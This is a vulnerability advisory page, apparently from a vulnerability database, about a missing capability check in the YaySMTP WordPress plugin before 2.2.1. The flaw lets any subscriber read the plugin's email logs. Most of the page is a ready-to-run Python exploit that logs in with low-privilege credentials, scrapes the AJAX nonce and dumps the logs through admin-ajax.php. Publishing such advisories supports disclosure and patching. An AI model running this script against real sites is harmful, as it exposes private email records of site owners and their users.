YaySMTP < 2.2.1 - Subscriber+ Logs Disclosure

2022-07-1100:00:00

Rafshanzani Suhada

233

0.001 Low

EPSS

Percentile

25.0%

JSON

The plugin does not have capability check in an AJAX action, allowing any logged in users, such as subscriber to view the Logs of the plugin

# @author : 0xshdax (Rafshanzani Suhada)
# @usage : python3 script.py http://localhost
import requests, sys, re, json

## Setup here
url = sys.argv[1]
headers = { 'Content-Type': 'application/x-www-form-urlencoded' }
username = 'guest'
password = 'guest'
regexnonce = r"\"ajaxNonce\":\"(.*?)(?:\",\"currentMailer\")"

##
def loginWP(username, password, url):
    global regexnonce

    session = requests.Session()
    cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' }
    data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : url + '/wp-admin/', 'testcookie' : 1 }
    
    response = session.post(url + '/wp-login.php', cookies=cookies, data=data)
    responses = response.text
    findnonce = re.findall(regexnonce,responses)
    if not findnonce:
        print('[ * ] Nonce not found or invalid credentials. Please check again!')
        exit()
    else:
        print('[ * ] Success get nonce!')
        datalog = 'action=yaysmtp_email_logs&nonce=' + findnonce[0] + '&params[page]=1&params[limit]=10'
        getlogsmtp = session.post(url + '/wp-admin/admin-ajax.php', headers=headers, data=datalog)
        prettyjson = json.loads(getlogsmtp.text)
        print(json.dumps(prettyjson, indent=4))

print('[ * ] Trying to login user!')
getnonce = loginWP(username, password, url)

0.001 Low

EPSS

Percentile

25.0%

JSON

Related for WPEX-ID:9EC8D318-9D25-4868-94C6-7C16444C275D